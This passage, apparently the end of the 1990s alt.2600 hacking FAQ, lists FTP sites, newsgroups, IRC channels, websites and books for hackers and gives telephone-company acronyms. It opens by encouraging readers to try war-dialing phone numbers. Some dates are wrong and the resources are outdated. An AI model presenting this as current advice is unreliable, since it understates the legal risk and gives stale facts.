the whole purpose is to call every number once and only once.  It's
not likely to be thought of as harassment by anyone who gets a single
phone call from a scanning computer.  Some central offices have been
known to react strangely when people start scanning.  Sometimes you're
unable to get a dialtone for hours after you start scanning.  But
there is no uniform policy.  The best thing to do is to first find out
if you've got some crazy law saying you can't do it.  If, as is
likely, there is no such law, the only way to find out what happens is
to give it a try.
-EQ-
 
It should be noted that a law making scanning illegal was recently
passed in Colorado Springs, CO.  It is now illegal to place a call
in Colorado Springs without the intent to communicate.
 
 
 
Section C: Resources
~~~~~~~~~~~~~~~~~~~~
 
01. What are some ftp sites of interest to hackers?
 
aql.gatech.edu
bellcore.com
cert.org
cipher.com
cyberspace.com
deimos.cs.uah.edu
ftp.csua.berkeley.edu   /pub/cypherpunks
ftp.eff.org             /pub/cud
ftp.etext.org
ftp.netcom.com          /pub/bradleym
ftp.netcom.com          /pub/zzyzx
ftp.netsys.com
ftp.win.tue.nl
ftp.winternet.com       /users/craigb
garbo.uwasa.fi:pc/crypt
ghost.dsi.unimi.it:/pub/crypt
grind.isca.uiwa.edu
hack-this.pc.cc.cmu.edu
halcyon.com
info.cert.org
lcs.mit.edu             /* Telecom archives */
ripem.msu.edu:pub/crypt
rtfm.mit.edu
spy.org
theta.iis.u-tokyo.ac.jp /pub1/security
vincent2.iastate.edu    login: anonymous.mabell /* Closed for the Summer */
wimsey.bc.ca            /pub/crypto
 
 
02. What are some newsgroups of interest to hackers?
 
alt.2600
alt.cellular-phone-tech
alt.dcom.telecom
alt.hackers
alt.locksmithing
alt.sect.telcom
alt.security.index
alt.security.keydist
alt.security.pgp
alt.security.ripem
alt.security
comp.dcom.cellular
comp.dcom.telcom.tech
comp.dcom.telecom       Telecommunications digest. (Moderated)
comp.dcom.telecom.tech
comp.org.cpsr.announce
comp.org.cpsr.talk
comp.org.eff
comp.org.eff
comp.security.announce
comp.security.misc      Security issues of computers and networks.
comp.security.unix
comp.virus              Computer viruses & security. (Moderated)
misc.security           Security in general, not just computers. (Moderated)
rec.pyrotechnics
sci.crypt               Different methods of data en/decryption.
 
 
03. What are some telnet sites of interest to hackers?
 
phred.pc.cc.cmu.edu
 
 
04. What are some gopher sites of interest to hackers?
 
gopher.eff.org
wiretap.spies.com
 
 
05. What are some World wide Web (WWW) sites of interest to hackers?
 
http://crimelab.com//bugtraq/bugtraq/html
http://cs.purdue.edu/homes/spaf/coast.html
http://cs.purdue.edu/homes/spaf/pcert.html
http://first.org
http://l0pht.com
http://tamsun.tamu.edu/~clm3840/hacking.html/
http://www.iia.org/~gautier/me.html
http://www.net23.com
http: /www.paranoia.com /defcon
http://www.phantom.com/~king
http://www.spy.org /Security/Local/News
 
 
06. What are some IRC channels of interest to hackers?
 
#2600
#hack
#phreak
#linux
#root
#unix
#warez
 
 
07. What are some BBS's of interest to hackers?
 
Home BBS 	(303)343-4053
 
 
08. What books are available on this subject?
 
Applied Cryptography: Protocols, Algorithms, and Source Code in C
Author: Bruce Schneier
Publisher: John Wiley & Sons
Copyright Date: 1994
ISBN: 0-471-59756-2
 
Computer Security Basics
Author: Deborah Russell and G.T. Gengemi Sr.
Publisher: O'Reilly & Associates, Inc.
Copyright Date: 1991
ISBN: 0-937175-71-4
 
Practical Unix Security
Author: Simson Garfinkel and Gene Spafford
Publisher: O'Reilly & Associates, Inc.
Copyright Date: 1991
ISBN: 0-937175-72-2
 
Unix Security: A Practical Tutorial
Author: N. Derek Arnold
Publisher: McGraw Hill
Copyright Date: 1993
ISBN: 0-07-002560-6
 
Unix System Security: A Guide for Users and Systems Adiministrators
Author: David A. Curry
Publisher: Addison-Wesley
Copyright Date: 1992
ISBN: 0-201-56327-4
 
Unix System Security
Author: Patrick H. Wood and Stephen G. Kochan
Publisher: Hayden Books
Copyright Date: 1985
ISBN: 0-672-48494-3
 
Computer Viruses, Worms, Data Diddlers, Killer Programs, and Other
        Threats to Your System
Author: John McAfee and Colin Haynes
Publisher: St. Martin's Press
Copyright Date: 1989
ISBN: 0-312-03064-9 and 0-312-02889-X
 
Hackers: Heroes of the Computer Revolution
Author: Steven Levy
Publisher: Doubleday
Copyright Date: 1984
ISBN: 0-440-13495-6
 
Network Security Secrets
Author: David J. Stang and Sylvia Moon
Publisher: IDG Books
Copyright Date: 1993
ISBN: 1-56884-021-7
 
The Hacker Crackdown: Law and Disorder on the Electronic Frontier
Author: Bruce Sterling
Publisher: Bantam Books
Copyright Date: 1982
ISBN: 0-553-56370-X
 
Secrets of a Super Hacker
Author: The Knightmare
Publisher: Loompanics
Copyright Date: 1994
ISBN: 1-55950-106-5
 
 
 
Section D: Miscellaneous
~~~~~~~~~~~~~~~~~~~~~~~~
 
01. What does XXX stand for?
 
TLA Three Letter Acronym
 
ACL     Access Control List
PIN     Personal Identification Number
TCB     Trusted Computing Base
 
ALRU    Automatic Line Record Update
AN      Associated Number
ARSB    Automated Repair Service Bureau
ATH     Abbreviated Trouble History
BOC     Bell Operating Company
BOR     Basic Output Report
CA      Cable
COE     Central Office Equipment
CMC     Construction Maintenance Center
CNID    Calling Number IDentification
CO      Central Office
COCOT   Customer Owned Coin Operated Telephone
CRSAB   Centralized Repair Service Answering Bureau
DDD     Direct Distance Dialing
ECC     Enter Cable Change
LD      Long Distance
LMOS    Loop Maintenance Operations System
MLT     Mechanized Loop Testing
NPA     Numbering Plan Area
POTS    Plain Old Telephone Service
RBOC    Regional Bell Operating Company
RSB     Repair Service Bureau
SS      Special Service
TAS     Telephone Answering Service
TH      Trouble History
TREAT   Trouble Report Evaluation and Analysis Tool
 
NTA     The Nocturnal Trading Alliance
PE      Public Enemy
TDT     The Dream Team
THG     The Humble Guys
THP     The Hill People
 
-- 
\* Will Spencer        : The advancement and diffusion of knowledge *\
\* Unix geek           : is the only guardian of true liberty.      *\
\* PC guru             :               --  James Madison            *\
\* Revolutionary       :               4th U.S. President           *\

